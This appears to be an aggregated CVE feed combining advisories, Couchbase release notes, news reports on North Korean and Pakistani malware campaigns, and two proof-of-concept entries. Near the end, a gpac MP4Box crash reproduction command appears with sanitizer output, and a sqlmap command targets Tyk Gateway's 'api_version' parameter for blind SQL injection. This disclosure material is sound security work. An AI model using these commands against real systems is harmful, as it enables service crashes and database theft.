A use-after-free flaw was found in lan78xx_disconnect in drivers/net/usb/lan78xx.c in the network sub-component, net/usb/lan78xx in the Linux Kernel. This flaw allows a local attacker to crash the system when the LAN78XX USB device detaches.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-6039: cve-details

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

Couchbase Server 7.2.1 was released in September 2023.

**New Features**

This release includes the following new features.

**XDCR**

The following XDCR features are new:

*   XDCR replications, specified by means of the REST API, can now use the filterBinary flag. This specifies whether binary documents should be replicated. Detailed information on the filterBinary flag is provided on the REST reference page, Creating a Replication.
    
*   Using the REST API, node-connectivity can now be checked, prior to the creation of an XDCR reference. See Checking Connections.
    
*   In Couchbase Server Version 7.2.1 and later, XDCR provides enhanced information on cluster-rebalance status. See Rebalance Information
    

**Enhancements**

This release includes the following enhancements:

*   Bloom filters for the Indexing Service were not previously enabled by default. Bloom filters are now enabled by default. This change reduces the Index Service disk lookups when there are insert heavy workloads. Bloom filters are used by the index storage layer to reduce the disk i/o and improve the overall efficiency of the index service. You can disable bloom filters and opt out.
    

**Future Reserved Words**

To give you enough time to prepare ahead, we are going to add the following reserved words for features in an upcoming Couchbase Server release:

*   SEQUENCE
    
*   CACHE
    
*   RESTART
    
*   MAXVALUE
    
*   MINVALUE
    
*   NEXT
    
*   PREV
    
*   PREVIOUS
    
*   NEXTVAL
    
*   PREVVAL
    
*   CYCLE
    
*   RECURSIVE
    
*   RESTRICT
    

No action is required for upgrading to Server 7.2.1.

**New Supported Platforms**

This release adds support for the following new platforms:

*   Alma Linux 9
    
*   Rocky Linux 9
    

**Fixed Issues**

This release contains the following fixes.

**Analytics Service**

  

Issue

Description

Resolution

MB-56957

External collections could not be created using Azure Managed Identity.

Azure dependencies have been updated to correct this issue.

MB-57588

Query results could be unnecessarily converted twice to JSON when documents were large.

The Query result is now converted to JSON once for all documents.

MB-57615

When the Prometheus stats returned from Analytics exceeded four kilobytes, the status code was inadvertently set to 500 (Internal Error), and this resulted in a large number of warnings in the Analytics warning log. Couchbase Server discarded these statistics.

This has been fixed to properly return a 200 (OK) status code when the size of Prometheus stats exceeds 4KiB, allowing these stats to be recorded properly. The warning is not displayed.

**Data Service**

  

Issue

Description

Resolution

MB-39344

The last item in a replica checkpoint was not expelled. In scenarios such as large average item size, high numbers of replicas or low Bucket quota could result in a data-node entering an unrecoverable Out-of-Memory state.

ItemExpel has been enhanced to release all the items in a checkpoint when memory conditions allow.

MB-56084

A rollback loop affected legacy clients when collections were used and a tombstone newer than the last mutation in the default collection was purged.

The lastReadSeqno is now Incremented when the client is not collection-aware.

MB-56644

In rare cases, after a failover or memcached restart, a replica rollback while under memory pressure might have caused a crash in the Data Service.

Memory pressure recovery logic (Item expelling) is now skipped when replica rollback is in progress.

MB-56970

XDCR or restore from backup entered an endless loop if attempting to overwrite a document which was deleted or expired some time ago with a deleteWithMeta operation. This was due to a specific unanticipated state in memory which increased CPU usage, and connection became unusable for further operations.

deleteWithMeta is now resilient to temporary non-existent values with xattr datatype.

MB-57002

When using .NET SDK on Windows 10 client and client certs were enabled on CB Server, the Data-Service did not establish a connection and client bootstrap failed with a OpenSSL “session id context uninitialized" error.

Data-Service has been updated to disable TLS session resume.

MB-57064

GET\_META requests for deleted items fetched metadata in memory which was not evicted in value-eviction buckets.

Metadata items are now cleaned when the expiry pager runs.

MB-57106

DCP clients streamed in out-of-sequence-order \[OSO\] backfill snapshots under Magma observed duplicate documents received in the disk snapshot. This happened where the stream was paused and resumed when the resume point was wrongly set to a key already processed in the stream.

OSO backfill in Magma now sets the correct resume point after a pause.

MB-57304

Data Service rebalance duration was significantly impacted if other DCP clients created a large number of Streams, if those streams needed to be read from disk, due to the lack of prioritizing between rebalance and other DCP clients.

The number of backfills each DCP client can perform concurrently has been limited to allow fairer allocation of resources.

MB-57400

The computation count for the items remaining DCP/Checkpoint stats exposed to Prometheus was the O(N) function. Where N is the number of items in a checkpoint. This caused various performance issues including Prometheus stats timeouts when checkpoints accumulated a high number of items.

The computation count has been optimized and now is O(1).

MB-57609

A spurious auto-failover could happen when Magma compaction visited a TTL’d document that was already deleted.

Document not found does not now increment the number of read failures.

**Index Service**

  

Issue

Description

Resolution

MB-56339

During scaling, an GSI indexer rebalance froze and did not successfully complete. This was because an index snapshot was not correctly deleted and recreated.

A flag now handles snapshots to ensure they are correctly deleted or recreated when indexes are updated during rebalancing.

MB-57021

When alter index updated the replica count, new replicas were not built immediately when the original definition was {defer\_build: true}. Existing replicas were built and new replicas were built in the next processing iteration.

New replicas are now built when the replica count is updated for deferred indexes. The status of existing index instances is checked, and if ready, a new build of the instance is triggered.

MB-57777

When the indexer was unable to keep up with KV mutations, and there was a queue of mutations within the indexer, there was a large memory overhead from the bookkeeping of queued up mutations.

Indexer has been improved to optimize memory usage so that the bookkeeping overhead is reduced for queued up mutations.

**Query Service**

  

Issue

Description

Resolution

MB-56533

Due to how nested dependencies were handled, a sudden rise in memory utilization of the query service on a node caused a memory alert issue. The node did not recover correctly following a restart.

Nested dependencies are now handled appropriately in the ADVISE statement.

MB-56563

A query with multiple filters on an index key, one of which was a parameter, could produce incorrect results. This was caused by incorrectly composing the exact index spans to support the query.

The way in which exact spans are set has been modified to correct this issue.

MB-56579

Covering FLATTEN\_KEYS() on an array index generated incorrect results. This was because a modified version of the ANY clause was applied after the index which meant false positives were retained and Distinct scan rows were eliminated.

The ANY filter is now applied on an index scan itself when covering an index scan with flatten keys.

MB-56683

Inter-service read timeout errors were not detected or handled accordingly. User requests consequently failed with timeout errors without retrying with a new connection.

The error handling and retry mechanism has been modified to handle these types of timeout issues and errors.

MB-56727

Under certain circumstances, a query with UNNEST used a covering index scan and incorrect results were returned. Reference to the UNNEST expression should have prevented the covering index from being used for the query as the index did not contain the entire array.

The logic to determine covering UNNEST scans has been changed to not use a covering index scan for such queries.

MB-56937

When an index scan had multiple spans, index selectivity was incorrectly calculated.

Index selectivity for multiple index spans is now correctly calculated.

MB-57024

Incorrect results were returned for a non-IndexScan on a constant false condition. This was due to incorrect handling of a FALSE WHERE clause.

The FALSE WHERE clause is now correctly handled.

MB-57029

Querying system:functions\_cache in a multi query node cluster returned incomplete results with warnings. The query result included entries in the local query node, but none from remote query nodes. This was due to a typographical error.

The typographical error has been corrected.

MB-57080

A panic in go\_json.stateInString under parsed value functions caused by incorrect concurrent access resulted in the state being freed whilst still in use.

The concurrent access issue has been resolved.

MB-57251

A Prepared statement might have resulted in an incorrect result in a multi-node environment. For example, a database with two query nodes.

Correlated subqueries from an encoded plan are now detected and marked. This ensures correct results are provided.

MB-57279

When a WITH clause (common table expression, or CTE) was used inside a subquery, and the WITH clause definition referenced the parent query, and was correlated, the query engine did not properly detect the correlation. This produced an incorrect result from the WITH clause evaluation because the result was not cached correctly.

Correlations inside WITH clause definitions are now properly detected.

MB-57316

cbq required a client authentication key file whenever a certificate authority file was used.

cbq now accepts a certificate authority file without a client key file enabling use with username and password credentials.

MB-57680

When appropriate optimizer statistics were used in Cost-Based Optimizer (CBO), for a query with ORDER BY, if there were multiple indexes available for the query, CBO unconditionally favored an index that provided ordering. Such indexes were not always the best ones to use.

CBO now allows cost-based comparison of indexes.

MB-57838

An ADVISE statement with multiple levels of UNNEST caused a syntax error in the CREATE INDEX statement from the Index Advisor.

ADVISE has been improved when there are queries with multiple levels of UNNEST.

**Cluster Manager**

  

Issue

Description

Resolution

MB-57484

A Cluster Manager process crash meant the Delete Bucket memcached command was not always called before bucket files were deleted later in rebalance. This caused the memcached process to crash repeatedly causing data service downtime.

The Delete Bucket command is now called on memcached before a file is deleted during rebalance. This ensures mencached doesn’t attempt to read the files.

**Cross Datacenter Replication (XDCR)**

  

Issue

Description

Resolution

MB-56601

Data streamed from the Data Service over XDCR should always be streamed in order by mutation id. However, in some scenarios, for efficiency, the Data Service streamed records that were not ordered by mutation id. In certain situations, this out-of-sequence-order \[OSO\] caused performance issues.

OSO mode is now available as a global override to be switched off for any currently deployed replications to avoid performance issues.

MB-56711

XDCR did not process documents with a JSON array and Extended Attributes (XATTRs). When a document contained XATTRs, XDCR checked for XATTRs in transactions, transaction filters were enabled, and XATTRs were not checked.

When documents contain arrays, XATTRs are now checked in the transaction XATTRs, and the document is not prevented from being parsed in an array.

MB-56741

Binary documents were replicated when an Advanced Filtering Expression was present.

A filter has been added which can be turned on to prevent all binary documents from being replicated.

MB-56773

It appeared that XDCR had stalled and an explanation was not provided. For rebalances on the source or target, the XDCR pipeline should be restarted, and data movement should continue. Before the pipeline was restated, there might have been fewer data movements as the rebalanced VBs were no longer streaming.

An ETA is now provided in the Server UI to show when the pipeline is due to be restarted.

MB-56799

Checkpoint Manager created checkpoint records out-of-sequence when many target nodes ran slowly.

Checkpoint Manager now creates checkpoints in sequence when target nodes are slow.

MB-56848

The bucket topology service sent a concurrent map iteration and map write panic to XDCR which caused a fatal error.

Validation has been improved to prevent the panic from happening.

MB-56938

Prometheus stats did not include a pipeline’s status.

The pipeline status is now provided as part of a prometheus stat.

MB-57130

A Checkpoint Manager Initialization error caused two memory leak types. These were a backfill pipeline and a main pipeline memory leak.

The Pipeline Manager and backfill pipeline have both been modified to prevent the memory leaks.

MB-57183

XDCR Checkpoint Manager instances were not cleaned up under certain circumstances due to timing and networking issues when contacting target, or when an invalid backfill task was fed in as input.

Checkpoint Manager instances are now cleaned up. A flag has been added to check for invalid backfill tasks.

MB-57234

When a replication spec change was made to a non-Data Service node, delete replication hung and caused the node to return an incorrect replication configuration.

XDCR now checks that the node is running the Data Service and handles it correctly.

MB-57277

XDCR could fail due to multiple connection issues. For example, DNS issues or firewalls. For a number of databases, it was a difficult task to manually check every node to determine where the connection issue was. For multiple nodes in a database and in the target database, debugging the issue required many connection checks.

A connection pre-check feature has been added to XDCR which ensures all connections from source nodes to target nodes are valid. Credentials are now also checked.

MB-57412

Running ipv6 only mode + non-encrypted remote resulted in invalid IP addresses being returned, leading to connection issues.

A valid IP address is now returned.

MB-57462

StatsMgr stopping could hang due to watching for notifications resulting in stranded go-routines.

Go-routines are now stopped correctly.

MB-57562

When ipv4 only mode was used, and full encryption only had an alternate address configured where the internal address was unresolvable, XDCR resulted in an error when it contacted the target data nodes.

The specific scenario has been fixed so that replication can now proceed.

MB-57743

The Prometheus endpoint did not expose any XDCR error metrics.

XDCR error metrics are now exposed via Prometheus.

MB-57787

A legacy race condition where metadata store could cause a conflict was exposed as part of the binary filter improvements.

Legacy race conditions have all been resolved.

MB-58203

Under certain circumstances, when rebalancing, the target cluster could return an EACCESS error code that caused source XDCR to pause the pipeline.

This has been reversed. Instead of pausing the pipeline when rebalancing, XDCR now retries when an EACCESS error is encountered in XmemNozzle. XDCR counts and prints this activity in the log.

MB-58545

Checkpoint Manager could be stuck when stopping if it had not been started yet, resulting in memory leak.

Checkpoint Manager can now be stopped correctly even when it hasn’t been started.

**Metrics and Monitoring**

  

Issue

Description

Resolution

MB-56464

An issue occurred where the Cluster Manager instructed Prometheus to reload the configuration and the reload timeout impacted other requests.

The Cluster Manager has been improved to handle timeouts when instructing Prometheus to reload the configuration.

MB-56517

The Cluster Manager’s computed utilization stats were inaccurate due to time interval discrepancies in components where data was collected.

The Cluster Manager now reports raw stats as Prometheus counters.

**Storage**

  

Issue

Description

Resolution

MB-57157

Inconsistencies were observed where a single Magma bucket in a database took a long time to warm up.

The seq index scan has been optimized for tombstones of zero value size. Optimization is for look up by key, sequence iteration, and key iteration. Docs of 0 value size are placed in both key index and seq index.

MB-57714

Disk backfills were hanging permanently due to high memory consumption when large documents were streamed over many DCP streams concurrently.

Memory for a document read by a DCP stream is now released before switching to another stream.

**Known Issues**

**Search Service**

  

Issue

Description

Workaround

MB-58450

An issue occurs with node failover. If a user does not bring in a replacement node before the failover occurs, then lost active or lost replica search indexes that have partitions on the replaced node are not rebuilt.  
As a result, search requests return partial/incomplete results. In addition,existing indexes with defined replica(s) become vulnerable to another node failure.

This issue is only pertinent to the **7.2.1** release, and does not affect older builds.

This situation can be prevented if a replacement node was brought into the cluster in place of the failed over node, before starting the rebalance operation. This problem should not affect on-line or off-line rebalances.

If lost indexes are encountered, then, a manual update to the affected search index definition(s) will trigger a rebuild of the affected indexes.  
(The advice here is to toggle the replica count so that unaffected index partitions are re-used, and only the lost partitions are rebuilt.)

CVE-2023-36667: Release Notes for Couchbase Server 7.2

A local privilege escalation (PE) vulnerability in the Palo Alto Networks Cortex XSOAR engine software running on a Linux operating system enables a local attacker to execute programs with elevated privileges if the attacker has shell access to the engine.

Palo Alto Networks Security Advisories / CVE-2023-3282

Urgency **MODERATE**

Response Effort **MODERATE**

Recovery **USER**

Value Density **CONCENTRATED**

Attack Vector **LOCAL**

Attack Complexity **HIGH**

Attack Requirements **PRESENT**

Automatable **NO**

User Interaction **NONE**

Product Confidentiality **NONE**

Product Integrity **NONE**

Product Availability **NONE**

Privileges Required **HIGH**

Subsequent Confidentiality **HIGH**

Subsequent Integrity **HIGH**

Subsequent Availability **HIGH**

NVD JSON

Published **2023-11-08**

Updated **2023-11-08**

Reference **CRTX-70551**

Discovered **externally**

**Description**

A local privilege escalation (PE) vulnerability in the Palo Alto Networks Cortex XSOAR engine software running on a Linux operating system enables a local attacker to execute programs with elevated privileges if the attacker has shell access to the engine.

**Product Status**

Versions

Affected

Unaffected

Cortex XSOAR 8

None

All

Cortex XSOAR 6.12

None

All

Cortex XSOAR 6.11

None

All

Cortex XSOAR 6.10

< 6.10.0.250144 on Linux

\>= 6.10.0.250144 on Linux

**Required Configuration for Exposure**

This issue is applicable only to Cortex XSOAR engines installed through the shell method that are running on a Linux operating system.

Please see the following link for more Cortex XSOAR engine installation information:

https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/6.10/Cortex-XSOAR-Administrator-Guide/Install-a-Cortex-XSOAR-Engine

**Severity: MEDIUM**

CVSSv4.0 Base Score: 4.9 (CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/AU:N/R:U/V:C/RE:M/U:Amber)

**Exploitation Status**

Palo Alto Networks is not aware of any malicious exploitation of this issue.

**Weakness Type**

CWE-732 Incorrect Permission Assignment for Critical Resource

**Solution**

This issue is fixed in deployed Cortex XSOAR engines when an updated engine installer is created and used to upgrade the engine from Cortex XSOAR 6.10 build B250144 and all later builds of Cortex XSOAR.

**Acknowledgments**

Palo Alto Networks thanks Romeo Benzoni for discovering and reporting this issue.

**Timeline**

2023-11-08 Initial publication

CVE-2023-3282: CVE-2023-3282 Cortex XSOAR: Local Privilege Escalation (PE) Vulnerability in Cortex XSOAR Engine

By Waqas
BlueNoroff is a subgroup of the larger North Korean state-backed group called Lazarus.
This is a post from HackRead.com Read the original post: Lazarus-Linked BlueNoroff APT Targeting macOS with ObjCShellz Malware

The threat actor has a history of targeting cryptocurrency exchanges, venture capital firms, and banks.

Jamf Threat Labs’ security experts have discovered a new malware variant attributed to the BlueNoroff APT group. According to the company’s blog post published on 7 November 2023, this campaign, like BlueNoroff’s previous campaigns, seems to be financially motivated.

The threat actor has a history of targeting cryptocurrency exchanges, venture capital firms, and banks. BlueNoroff is a subgroup of the larger North Korean state-backed group called Lazarus.

The malware, dubbed ObjCShellz, is part of the RustBucket campaign, researchers believe. It is a later-stage malware variant of BlueNoroff’s RustBucket malware, because of their similar characteristics.

For your information, a later-stage malware is one that’s executed after the attacker has gained initial access and used for data exfiltration, lateral movement within the network, or maintaining persistence.

The malware was discovered while performing routine threat hunting. Further probing revealed that it was a Mach-O universal binary communicating with a domain (swissborgblog registered on May 31, 2023) that the company had previously classified as malicious because it was a fake version of the original domain (swissborg.com). The attackers created a **fake crypto exchange website** on this fake domain to trick users.

The malware is ad-hoc signed and can split its C2 URL into two different strings to evade detection. The IP address researchers detected (104.168.214151) was also linked to the same APT actor from their previous campaigns.

 “We have observed submissions to VirusTotal from countries such as Japan and the US in September and October” researchers noted in their **blog post**.

ObjCShellz is written in Objective-C, a programming language used for macOS applications. It is used as a macOS implant that establishes C2 communication after infiltrating the device and downloads/executes multiple payloads.

ObjCShellz is a lightweight malware featuring advanced obfuscation features. It operates as a simple remote shell and executes shell commands received from the C2 server. The malware sends a POST message to the fake URL version and gains information about the malware process before retrieving the operatingSystemVersionString to find out the macOS version.

Researchers could not determine how initial access was achieved. However, they are sure that this is a later-stage malware used in this multi-stage attack to run remote shell commands manually on Intel and Arm Macs.

The threat actor generally reaches out to victims as an investor or creates domains belonging to a legitimate crypto exchange. In this campaign too, the attacker contacts the victims as a head hunter or investor, offering them something beneficial or a partnership. Despite being simple, this malware is very functional and can allow threat actors to carry out a range of malicious objectives.

Hackread.com has observed a continuous surge in attacks against macOS devices and BlueNoroff’s **activities**. Earlier in November, Elastic Security Labs **detected** Lazarus group using a new macOS malware dubbed KandyKorn, targeting cryptocurrency users and blockchain engineers.

Back in 2021, AT&T Alien Labs researchers **discovered that** threat actors were harnessing malware-infected Macs and Windows devices as proxy exit nodes to reroute proxy requests. In December 2022, Kaspersky researchers **reported** that BlueNoroff is targeting cryptocurrency-related financial entities worldwide with new, sophisticated malware strains and 70 fake domains of venture capital firms and banks.

To protect against ObjCShellz malware, organizations must keep software and operating systems patched against new security flaws, use EDR (endpoint detection and response) solutions to monitor network activities, and employ network segmentation strategies to limit malware distribution by isolating critical systems.

Cybersecurity expert at the California-based **Menlo Security** browser security provider firm, Mr. Ngoc Bui, shared his findings on the BlueNoroff APT actor exclusively with Hackread.com. Bui noted that it has been active since 2016-2017 and its key targets are financial entities in Europe and North America. 

“BlueNoroff is a North Korean-backed advanced persistent threat (APT) group that has been active since at least 2016/2017. The group is known for targeting cryptocurrency exchanges, venture capital firms, and banks in North America and Europe,” explained Bui BlueNoroff’s attacks are typically financially motivated, and the group has been known to use a variety of malware and techniques to steal sensitive data and funds from its victims.”

About their malware RustBucket, Bui noted that this backdoor is written in rust and collects basic system details before contacting the C2. 

“RustBucket is a backdoor written in rust. The backdoor collects basic system information and communicates to the URL provided via the command line. Supported backdoor commands include file execution and exit. RustBucket is a malware campaign also attributed to BlueNoroff, first uncovered in 2021. It uses phishing emails posing as job recruiters to infect targets with backdoor malware that can steal data and remotely control infected systems,” Bui said.

Bui believes that Jamf Threat Labs’ discover holds significance because it highlights that the actor is continually improving its malware strains. 

“The discovery of the new malware strain by Jamf Threat Labs is significant because it shows that BlueNoroff is continuing to develop new and sophisticated malware. The fact that the malware was undetected by VirusTotal at the time of uploading suggests that BlueNoroff is taking steps to evade detection. For North Korea, this is a big deal if you have been following the different APTs and activities from that country.”

Bui noted that ObjCShellz is a big threat for macOS users “because it is disguised as legitimate software and can be difficult to detect. The malware can also steal sensitive data, such as cryptocurrency wallets and passwords. And a low detection rate means it may get past AV.”

Colorado-based cybersecurity advisory services provider **Coalfire**’s vice president Andrew Baratt told Hackread.com that it is hard to draw definite linkages between malware.

“It’s hard to really draw official linkages between malware that shares commonalities as many disparate threat actors borrow and steal from other malware campaigns. Copying legit sites is a fairly common tactic to evade detection on the C2 side of a malicious capability.” 

“We’ve been pointing out for some time that VirusTotal (VT) is only as good as its first observation time, and if malware authors are building up offline testing capabilities, the time it takes for detection is going to be much more significant. We also potentially have the signs of AI usage creeping into malware development,” said Baratt.

Historically, it can be seen in VT as it has been used as a test run for a piece of malware – as a cross over for detection -then multiple iterations are used until evasion is achieved. The challenge for the malware is that this creates a timeframe and VT, now owned by Google, has a window of advantage to do further analysis. If they’re using generative AI to help modify the malware, there is a real potential for new evasion techniques to be used with a reasonably high degree being under the purview of VT,” Baratt explained.

****_RELATED ARTICLES_****

1.  **MacStealer: A New Malware Targeting macOS Catalina Devices**
2.  **New macOS malware XcodeSpy found sneaking into spy on victims**
3.  **Linux, Windows and macOS Hit By New “Alchimist” Attack Framework**
4.  **Researchers Leverage ChatGPT to Expose Notorious macOS Malware**
5.  **UpdateAgent malware variant impersonates legitimate macOS software**

Lazarus-Linked BlueNoroff APT Targeting macOS with ObjCShellz Malware

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

CVE-2023-41270: SMOLD TV: Old & Smart

Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data.

**Version**

    root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev573-g201320819-master
    (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: 
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Platform**

    root@4dd48d09e778:~/gpac/bin/gcc# uname -a
    Linux 4dd48d09e778 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    

**Poc**

    Pocgpac:https://github.com/S0ngJX/Poc/blob/main/Pocgpac
    

**Asan**

    root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -dash 1000 -profile live -out session.mpd Pocgpac:@reframer:sap=1 Pocgpac
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==4066570==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff5cc2ed0 bp 0x7ffffffeaf40 sp 0x7ffffffea6d8 T0)
    ==4066570==The signal is caused by a READ memory access.
    ==4066570==Hint: address points to the zero page.
        #0 0x7ffff5cc2ed0  (/lib/x86_64-linux-gnu/libc.so.6+0x184ed0)
        #1 0x441f94 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/root/gpac/bin/gcc/MP4Box+0x441f94)
        #2 0x44236a in bcmp (/root/gpac/bin/gcc/MP4Box+0x44236a)
        #3 0x7ffff681ed6d in gf_isom_get_user_data /root/gpac/src/isomedia/isom_read.c:2807:51
        #4 0x7ffff71e9acb in isor_declare_track /root/gpac/src/filters/isoffin_load.c:696:5
        #5 0x7ffff71fb2f6 in isor_declare_objects /root/gpac/src/filters/isoffin_load.c:1728:3
        #6 0x7ffff72023e7 in isoffin_setup /root/gpac/src/filters/isoffin_read.c:181:6
        #7 0x7ffff71ffb66 in isoffin_configure_pid /root/gpac/src/filters/isoffin_read.c:477:9
        #8 0x7ffff6f1abed in gf_filter_pid_configure /root/gpac/src/filter_core/filter_pid.c:876:6
        #9 0x7ffff6f367b6 in gf_filter_pid_connect_task /root/gpac/src/filter_core/filter_pid.c:1230:3
        #10 0x7ffff6f85478 in gf_fs_thread_proc /root/gpac/src/filter_core/filter_session.c:2105:3
        #11 0x7ffff6f83fed in gf_fs_run /root/gpac/src/filter_core/filter_session.c:2405:3
        #12 0x7ffff69bd98c in gf_dasher_process /root/gpac/src/media_tools/dash_segmenter.c:1236:6
        #13 0x50dfc7 in do_dash /root/gpac/applications/mp4box/mp4box.c:4831:15
        #14 0x50dfc7 in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6245:7
        #15 0x7ffff5b62082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
        #16 0x42adad in _start (/root/gpac/bin/gcc/MP4Box+0x42adad)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184ed0) 
    ==4066570==ABORTING
    
    
    

**Reproduce**

    ./MP4Box -dash 1000 -profile live -out session.mpd Pocgpac:@reframer:sap=1 Pocgpac
    

**Credit**

    Song Jiaxuan (Huazhong University of Science and Technology)
    Zeng Yunxiang (Huazhong University of Science and Technology)

CVE-2023-46001: SEGV in gpac/src/isomedia/isom_read.c:2807:51 in gf_isom_get_user_data · Issue #2629 · gpac/gpac

The North Korea-linked nation-state group called BlueNoroff has been attributed to a previously undocumented macOS malware strain dubbed ObjCShellz.
Jamf Threat Labs, which disclosed details of the malware, said it's used as part of the RustBucket malware campaign, which came to light earlier this year.
"Based on previous attacks performed by BlueNoroff, we suspect that this malware was a late

Endpoint Security / Malware

The North Korea-linked nation-state group called BlueNoroff has been attributed to a previously undocumented macOS malware strain dubbed **ObjCShellz**.

Jamf Threat Labs, which disclosed details of the malware, said it's used as part of the RustBucket malware campaign, which came to light earlier this year.

"Based on previous attacks performed by BlueNoroff, we suspect that this malware was a late stage within a multi-stage malware delivered via social engineering," security researcher Ferdous Saljooki said in a report shared with The Hacker News.

BlueNoroff, also tracked under the names APT38, Nickel Gladstone, Sapphire Sleet, Stardust Chollima, and TA444, is a subordinate element of the infamous Lazarus Group that specializes in financial crime, targeting banks and the crypto sector as a way to evade sanctions and generate illicit profits for the regime.

The development arrives days after Elastic Security Labs disclosed the Lazarus Group's use of a new macOS malware called KANDYKORN to target blockchain engineers.

Also linked to the threat actor is a macOS malware referred to as RustBucket, an AppleScript-based backdoor that's designed to retrieve a second-stage payload from an attacker-controlled server.

In these attacks, prospective targets are lured under the pretext of offering them investment advice or a job, only to kick-start the infection chain by means of a decoy document.

ObjCShellz, as the name suggests, is written in Objective-C that functions as a "very simple remote shell that executes shell commands sent from the attacker server."

"We don't have details of who it was officially used against," Saljooki told The Hacker News. "But given attacks that we’ve seen this year, and the name of the domain that the attackers created, it was likely used against a company that works in the crypto currency industry or works closely with it."

The exact initial access vector for the attack is currently not known, although it's suspected that the malware is delivered as a post-exploitation payload to manually run commands on the hacked machine.

"Although fairly simple, this malware is still very functional and will help attackers carry out their objectives," Saljooki said.

The disclosure also comes as North Korea-sponsored groups like Lazarus are evolving and reorganizing to share tools and tactics among each other, blurring the boundaries, even as they continue to build bespoke malware for Linux and macOS.

"It is believed the actors behind \[the 3CX and JumpCloud\] campaigns are developing and sharing a variety of toolsets and that further macOS malware campaigns are inevitable," SentinelOne security researcher Phil Stokes said last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

N. Korean BlueNoroff Blamed for Hacking macOS Machines with ObjCShellz Malware

The Pakistan-linked threat actor known as SideCopy has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat.
Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a

The Pakistan-linked threat actor known as **SideCopy** has been observed leveraging the recent WinRAR security vulnerability in its attacks targeting Indian government entities to deliver various remote access trojans such as AllaKore RAT, Ares RAT, and DRat.

Enterprise security firm SEQRITE described the campaign as multi-platform, with the attacks also designed to infiltrate Linux systems with a compatible version of Ares RAT.

SideCopy, active since at least 2019, is known for its attacks on Indian and Afghanistan entities. It's suspected to be a sub-group of the Transparent Tribe (ak APT36).

"Both SideCopy and APT36 share infrastructure and code to aggressively target India," SEQRITE researcher Sathwik Ram Prakki said in a Monday report.

Earlier this May, the group was linked to a phishing campaign that took advantage of lures related to India's Defence Research and Development Organization (DRDO) to deliver information-stealing malware.

Since then, SideCopy has also been implicated in a set of phishing attacks targeting the Indian defense sector with ZIP archive attachments to propagate Action RAT and a new .NET-based trojan that supports 18 different commands.

The new phishing campaigns detected by SEQRITE entail two different attack chains, each targeting Linux and Windows operating systems.

The former revolves around a Golang-based ELF binary that paves the way for a Linux version of Ares RAT that's capable of enumerating files, taking screenshots, and file downloading and uploading, among others.

The second campaign, on the other hand, entails the exploitation of CVE-2023-38831, a security flaw in the WinRAR archiving tool, to trigger the execution of malicious code, leading to the deployment of AllaKore RAT, Ares RAT, and two new trojans called DRat and Key RAT.

"\[AllaKore RAT\] has the functionality to steal system information, keylogging, take screenshots, upload & download files, and take the remote access of the victim machine to send commands and upload stolen data to the C2," Ram Prakki said.

DRat is capable of parsing as many as 13 commands from the C2 server to gather system data, download and execute additional payloads, and perform other file operations.

The targeting of Linux is not coincidental and is likely motivated by India's decision to replace Microsoft Windows with a Linux flavor called Maya OS across government and defense sectors.

"Expanding its arsenal with zero-day vulnerability, SideCopy consistently targets Indian defense organizations with various remote access trojans," Ram Prakki said.

"APT36 is expanding its Linux arsenal constantly, where sharing its Linux stagers with SideCopy is observed to deploy an open-source Python RAT called Ares."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SideCopy Exploiting WinRAR Flaw in Attacks Targeting Indian Government Entities

Blind SQL injection in api_version parameter in Tyk Gateway version 5.0.3 allows attacker to access and dump the database via a crafted SQL query.

**Disclaimer**

For educational purpose only!

**Details**

Proof of concept for CVE-2023-42284. Tyk Gateway is vulnerable to SQL injection. Fixed in 5.0.7 version.

The URL parameter ‘api\_version’ of the "https://<YOUR\_URL>/api/errors/count/...?res=day&p=...&api\_version=<PAYLOAD\_HERE>&api\_id=..."is vulnerable to Blind SQL injection.

**Exploitation**

Use sqlmap with following parameters:

    python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=<INSERT YOUR API_ID>" -p "api_version" --cookie="<INSERT COOKIE HERE> --banner
    

SQL DB banner is returned in response:

    ...
    banner: Postgresql 13.01 on x86_64-pc-linux-gnu
    ...

CVE-2023-42284: GitHub - andreysanyuk/CVE-2023-42284: Proof of concept for CVE-2023-42284 in Tyk Gateway

